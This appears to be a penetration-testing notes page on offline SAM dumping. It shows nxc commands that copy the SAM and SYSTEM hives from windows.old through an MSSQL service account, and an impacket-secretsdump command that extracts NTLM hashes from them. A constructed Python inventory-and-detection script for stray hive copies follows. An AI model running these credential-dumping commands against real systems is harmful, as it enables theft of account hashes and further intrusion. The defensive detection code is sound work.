Local SAM Dump
If we have access to a windows.old directory or an old Windows backup, we can extract the SYSTEM and SAM registry hives to perform offline credential dumping:

- The SAM hive contains encrypted NTLM password hashes for local user accounts.
- The SYSTEM hive holds the boot key required to decrypt them.
```bash
# Download both hives with nxc
$ uv run nxc mssql <target-IP> -u sql_svc -p <pass> --get-file "c:\windows.old\windows\System32\SYSTEM" ./SYSTEM
$ uv run nxc mssql <target-IP> -u sql_svc -p <pass> --get-file "c:\windows.old\windows\System32\SAM" ./SAM

# Dump the local SAM hashes offline using the boot key from SYSTEM
$ impacket-secretsdump -system SYSTEM -sam SAM LOCAL
```

This technique is conceptually the same as using mimikatz lsadump::sam, which performs the same operation but directly on a live system.
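From the defender's side, the weak point above is that a stale copy of SAM and SYSTEM is sitting somewhere outside the live registry (a windows.old leftover, a backup volume, an exported hive) where a low-privileged service account can read it. The following Python is an added example for this page, not code from nxc, impacket or the original author: it classifies file paths that name a hive, so it can be used both as an inventory check over paths collected from a share or host and as a detection over flattened object-access events. The event line format, the `Subject=`/`ObjectName=`/`Access=` fields and all sample paths are constructed for the example; a real Security 4663 export would need its own parser.

```python
import re
from typing import Iterable, List, Optional, Tuple
from pathlib import PureWindowsPath

# Registry hive file names worth watching: SAM holds the hashes, SYSTEM the
# boot key that decrypts them, SECURITY the LSA secrets and cached credentials.
HIVE_NAMES = {"sam", "system", "security"}
# Tail of the only directory where these files normally live on a running host:
# <drive>\Windows\System32\config
LIVE_CONFIG_TAIL = ["windows", "system32", "config"]


def classify_hive_path(path: str) -> Optional[str]:
    """Return a reason string if `path` names a hive file outside the live
    %SystemRoot%\\System32\\config directory, otherwise None."""
    p = PureWindowsPath(path)  # works on any OS, no Windows needed
    if p.name.lower() not in HIVE_NAMES:
        return None
    parts = [part.lower() for part in p.parts]
    if "windows.old" in parts:
        return "hive in windows.old upgrade leftover"
    if parts[-4:-1] == LIVE_CONFIG_TAIL:
        return None  # the OS reads the live hives constantly; out of scope here
    return "hive copy outside live config (backup, export or snapshot)"


def find_stray_hives(paths: Iterable[str]) -> List[Tuple[str, str]]:
    """Inventory check: given file paths (for example gathered with os.walk over
    a share or system drive), return the hive copies that should be removed or
    locked down before someone takes them offline."""
    return [(path, reason) for path in paths if (reason := classify_hive_path(path))]


# Shape of a flattened object-access event used in this example (constructed,
# loosely modelled on the fields of a Windows Security 4663 event).
_EVENT_RE = re.compile(r"Subject=(?P<subject>.+?) ObjectName=(?P<object>.+?) Access=")


def find_hive_access(event_lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Detection: return (subject, path, reason) for every event in which a
    principal reads a hive copy outside the live config directory."""
    hits = []
    for line in event_lines:
        m = _EVENT_RE.search(line)
        if not m:
            continue
        reason = classify_hive_path(m["object"])
        if reason:
            hits.append((m["subject"], m["object"], reason))
    return hits


# Constructed sample events (not from any real host). The first two mirror the
# windows.old reads the page's nxc commands would produce.
SAMPLE_EVENTS = [
    r"EventID=4663 Subject=CORP\sql_svc ObjectName=C:\windows.old\windows\System32\SAM Access=ReadData",
    r"EventID=4663 Subject=CORP\sql_svc ObjectName=C:\windows.old\windows\System32\SYSTEM Access=ReadData",
    r"EventID=4663 Subject=NT AUTHORITY\SYSTEM ObjectName=C:\Windows\System32\config\SAM Access=ReadData",
    r"EventID=4663 Subject=CORP\alice ObjectName=C:\Users\alice\report.docx Access=ReadData",
    r"EventID=4663 Subject=CORP\bob ObjectName=D:\Backups\2023\SYSTEM Access=ReadData",
]


if __name__ == "__main__":
    for subject, path, reason in find_hive_access(SAMPLE_EVENTS):
        print(f"{subject} read {path}: {reason}")
```

Run over the constructed events it reports the two windows.old reads by sql_svc and the backup-volume read by bob, and stays quiet on the routine read of the live SAM by SYSTEM. The same `classify_hive_path` check, fed with paths from a share crawl, gives the list of leftover hive copies to delete or restrict, which removes the offline dumping opportunity the page describes.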